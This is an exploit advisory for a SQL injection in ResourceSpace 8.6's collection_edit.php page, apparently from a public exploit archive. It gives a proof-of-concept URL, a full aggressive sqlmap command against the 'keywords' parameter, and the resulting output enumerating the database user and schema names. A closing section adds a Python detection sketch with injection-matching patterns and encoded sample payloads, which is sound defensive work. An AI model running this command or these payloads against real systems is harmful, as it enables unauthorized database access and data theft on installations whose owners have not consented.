"ResourceSpace 8.6 - 'collection_edit.php' SQL Injection"

Author: dd_
Platform: php
Release date: 2019-01-28


# Exploit Title: ResourceSpace <=8.6 'collection_edit.php' SQL Injection
# Dork: N/A
# Date: 2019-01-25
# Exploit Author: dd_ (info@malicious.group)
# Vendor Homepage: https://www.resourcespace.com/
# Software Link: https://www.resourcespace.com/get
# Version: Stable release: 8.6
# Tested on: PHP/MySQL (PHP 7.2 / MySQL 5.7.25-0ubuntu0.18.04.2-log)
# Vendor Alerted: 1/21/2019
# Vendor Banner: ResourceSpace open source digital asset management software is the simple, fast, & free way to organise your digital assets.


# POC:
# 1)
# http://localhost/pages/collection_edit.php?CSRFToken=[CSRF_TOKEN_HERE]&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=[SQL]&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0




# Running the SQLMap command:

sqlmap -u 'http://localhost/pages/collection_edit.php' --data='CSRFToken=<csrf token>&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=*&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0' --cookie='language=en-US;language=en-US;thumbs=show;user=3154df279ea69a45caeaccf8a5fd1550;saved_col_order_by=created;saved_col_sort=ASC;per_page_list=15;saved_themes_order_by=name;saved_themes_sort=ASC;display=thumbs;per_page=48;saved_sort=DESC;geobound=-5244191.6358594%2C-786628.3871876%2C4;plupload_ui_view=list;ui_view_full_site=true' --dbms=mysql --level=5 --risk=3 -p keywords --technique=ETB --dbs --current-user --current-db --is-dba




# Will trigger the following injection methods:


[*] starting @ 13:21:45 /2019-01-25/

[13:21:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: keywords (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind
---
[13:21:47] [INFO] testing MySQL
[13:21:47] [INFO] confirming MySQL
[13:21:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.14.0
back-end DBMS: MySQL >= 5.0.0
[13:21:48] [INFO] fetching current user
[13:21:50] [INFO] retrieved: 'pwner@localhost'
current user:    'pwner@localhost'
[13:21:50] [INFO] fetching current database
[13:21:52] [INFO] retrieved: 'resourcespace'
current database:    'resourcespace'
[13:21:52] [INFO] testing if current user is DBA
[13:21:52] [INFO] fetching current user
current user is DBA:    False
[13:21:53] [INFO] fetching database names
[13:21:54] [WARNING] the SQL query provided does not return any output
[13:21:54] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[13:21:54] [INFO] fetching number of databases
[13:21:54] [INFO] resumed: 6
[13:21:54] [INFO] resumed: information_schema
[13:21:54] [INFO] resumed: mysql
[13:21:54] [INFO] resumed: performance_schema
[13:21:54] [INFO] resumed: phpmyadmin
[13:21:54] [INFO] resumed: resourcespace
[13:21:54] [INFO] resumed: sys
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] resourcespace
[*] sys

[13:21:54] [INFO] fetched data logged to text files under '/home/notroot/.sqlmap/output/localhost'

[*] ending @ 13:21:54 /2019-01-25/
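
For defenders, the three techniques sqlmap reports above (RLIKE boolean-based, EXTRACTVALUE error-based, RLIKE time-based) leave recognisable markers in the `keywords` parameter of `collection_edit.php`. The following detection sketch is an added example, not part of the original advisory or of ResourceSpace; the rule set, function names and sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter named in the advisory above.
ENDPOINT = "/pages/collection_edit.php"
PARAM = "keywords"

# Assumed rule set (tune for your own traffic), one marker per technique in the
# sqlmap report plus the schema enumeration it performs.
RULES = {
    "boolean-rlike": re.compile(r"'\s*RLIKE\s*\(\s*SELECT", re.I),
    "error-extractvalue": re.compile(r"\bEXTRACTVALUE\s*\(", re.I),
    "time-sleep": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
    "schema-enum": re.compile(r"\bINFORMATION_SCHEMA\b", re.I),
}

def normalize(value):
    """Replace /* ... */ SQL comments with a space and collapse whitespace."""
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).strip()

def inspect_request(method, target, body=""):
    """Return the sorted rule names matched by the keywords parameter."""
    parts = urlsplit(target)
    if parts.path != ENDPOINT:
        return []
    # GET carries the parameter in the query string, POST in the form body.
    raw = parts.query if method.upper() == "GET" else body
    hits = set()
    for value in parse_qs(raw, keep_blank_values=True).get(PARAM, []):
        text = normalize(value)  # parse_qs has already URL-decoded the value
        hits.update(name for name, rx in RULES.items() if rx.search(text))
    return sorted(hits)

# Constructed sample requests (not taken from a real log).
SAMPLES = [
    ("POST", ENDPOINT, "ref=3620&name=Holiday&keywords=beach+sunset+2018"),
    ("POST", ENDPOINT,
     "ref=3620&keywords=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F1%29"),
    ("GET", ENDPOINT + "?ref=3620&keywords=x%27+AND+EXTRACTVALUE%281%2C1%29+AND+%27a%27%3D%27a", ""),
    ("POST", ENDPOINT, "keywords=x%27+RLIKE+SLEEP%285%29+AND+%27a%27%3D%27a"),
    ("POST", "/pages/search.php", "keywords=x%27+RLIKE+SLEEP%285%29"),
]

if __name__ == "__main__":
    for method, target, body in SAMPLES:
        print(method, target[:40], inspect_request(method, target, body))
```

Detecting POST-based attempts requires a source that records request bodies, such as a WAF or reverse-proxy audit log, since standard access logs capture only the query string.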